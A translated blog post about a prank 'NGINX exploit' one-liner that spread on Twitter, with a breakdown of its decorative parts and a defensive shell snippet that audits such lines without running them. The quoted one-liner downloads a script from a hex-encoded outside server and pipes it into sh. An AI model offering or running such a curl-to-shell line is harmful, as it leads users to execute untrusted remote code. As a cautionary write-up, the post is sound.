Translator's note:
TL;DR: Never pipe files into sh or bash under any circumstances. It is a great way to lose control of your computer.
I want to share with you a short story about a joke PoC exploit that was created on May 31st. It appeared promptly in response to news from
After finishing work on a new curl chaining technique, I quoted the original tweet with a "leaked PoC" consisting of a single line of code that supposedly exploits the discovered vulnerability. Of course, this was complete nonsense. I assumed that I would be exposed immediately, and that I would get a few retweets (oh well).
However, I could not have imagined what happened next. The popularity of my tweet skyrocketed. Surprisingly, at this point (15:00 Moscow time on June 1) few people have realized that it is a fake. Many people retweet it without checking it at all (let alone admiring the beautiful ASCII graphics it outputs).
Just look at how beautiful it is!
While all these loops and colors are great, it is clear that people had to run the code on their own machine to see them. Fortunately, browsers work the same way, and combined with the fact that I did not really want to get into legal trouble, the code hosted on my site only made echo calls without trying to install or execute anything additional.
A small digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - more than just phishing
Safety and familiarity were a major part of this experiment. I think they are what led to its success. The command line implied safety by referencing "127.0.0.1" (the well-known localhost). Localhost is considered safe, and the data on it never leaves your computer.
Familiarity was the second key SEE component of the experiment. Since the target audience consisted mainly of people who know the basics of computer security, it was important to craft the code so that its parts looked familiar and well known (and therefore safe). Borrowing elements of old exploit concepts and combining them in an unusual way proved to be very successful.
Below is a detailed breakdown of the one-liner. Everything in this list is cosmetic in nature, and practically nothing in it is required for the line to actually work.
Which components are really necessary? They are -gsS, -O 0x0238f06a, |sh and the web server itself. The web server contained no malicious instructions; it simply served ASCII graphics using echo commands in the script contained in index.html. When the user entered the line with |sh in the middle, index.html was loaded and executed. Fortunately, the web server's operators had no ill intent.
- ../../../%00 - represents directory traversal;
- ngx_stream_module.so - the path to an arbitrary NGINX module;
- /bin/sh%00<'protocol:TCP' - we are supposedly launching /bin/sh on the target machine and redirecting its output to a TCP channel;
- -O 0x0238f06a#PLToffset - the secret ingredient, with #PLToffset added so that it looks like a memory offset somehow contained in the PLT;
- |sh; - another important fragment. We needed to redirect the output to sh/bash in order to execute the code coming from the attacking web server located at 0x0238f06a (2.56.240.x);
- nc /dev/tcp/localhost - a dummy in which netcat refers to /dev/tcp/localhost so that everything looks safe again. In fact, it does nothing and is included in the line for beauty.
This concludes the breakdown of the one-line script and the discussion of "socio-electronic engineering" (fancy phishing).
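The two load-bearing pieces named in the breakdown above (a bare hex integer that curl treats as a host, and the pipe into sh) can be picked out of a pasted line without running it. This is an added example, not part of the original post; the function names int_host_to_ip and audit_oneliner and the loopback sample value are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: static audit of a pasted one-liner. The command is only
# treated as a string; nothing is executed or fetched.

# Print the dotted-quad for a bare integer host (hex 0x..., or decimal).
# Returns 1 for anything else, so untrusted text never reaches $(( )).
int_host_to_ip() {
  case $1 in
    0[xX]*) case ${1#0[xX]} in ''|*[!0-9a-fA-F]*) return 1 ;; esac ;;
    ''|0*|*[!0-9]*) return 1 ;;
  esac
  [ "${#1}" -le 10 ] || return 1            # at most 32 bits' worth of digits
  _n=$(( $1 ))
  [ "$_n" -le 4294967295 ] || return 1
  printf '%d.%d.%d.%d\n' $(( (_n >> 24) & 255 )) $(( (_n >> 16) & 255 )) \
                         $(( (_n >> 8) & 255 ))  $(( _n & 255 ))
}

# Report two things the decoration hides: a stray integer-host argument
# and a pipe into a shell interpreter.
audit_oneliner() {
  _out="" _prev=""
  _spaced=$(printf '%s' "$1" | sed 's/[|;]/ & /g')  # make | and ; own tokens
  set -f                                            # no globbing on split
  for _tok in $_spaced; do
    case "$_prev:$_tok" in
      '|:sh'|'|:bash'|'|:dash'|'|:zsh') _out="$_out pipe-to-shell" ;;
    esac
    _host=${_tok%%#*}                               # drop decorative #fragment
    if _ip=$(int_host_to_ip "$_host"); then
      _out="$_out integer-host:$_host=$_ip"
    fi
    _prev=$_tok
  done
  set +f
  printf '%s\n' "${_out# }"
}

# Constructed sample with the same shape as the page's line (loopback value).
SAMPLE='curl -gsS https://127.0.0.1:443/x -O 0x7f000001#PLToffset |sh; nc /dev/tcp/localhost'
audit_oneliner "$SAMPLE"
```

Any bare decimal argument is reported as an integer host too, so a finding on a command other than curl needs a second look.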
Web Server Configuration and Countermeasures
Since most of my followers are infosec people/hackers, I decided to make the web server resistant to displays of "interest" on their part, so that the guys would have something to do (and it would be fun to set up). I am not going to list all the traps here since the experiment is still ongoing, but here are a few things the server does:
- It actively monitors distribution attempts on certain social networks and substitutes various preview thumbnails to encourage the user to click the link.
- It redirects Chrome/Mozilla/Safari/etc. to the Thugcrowd promotional video instead of showing the shell script.
- It watches for obvious signs of intrusion/blatant hacking, and then starts redirecting requests to NSA servers (ha!).
- It installs a Trojan, as well as a BIOS rootkit, on all computers whose users visit the host from a regular browser (just kidding!).
A small part of the countermeasures
In this case, my only goal was to learn some of Apache's features - in particular, the cool rules for redirecting requests - and I thought: why not?
NGINX Exploit (Real!)
Source: www.habr.com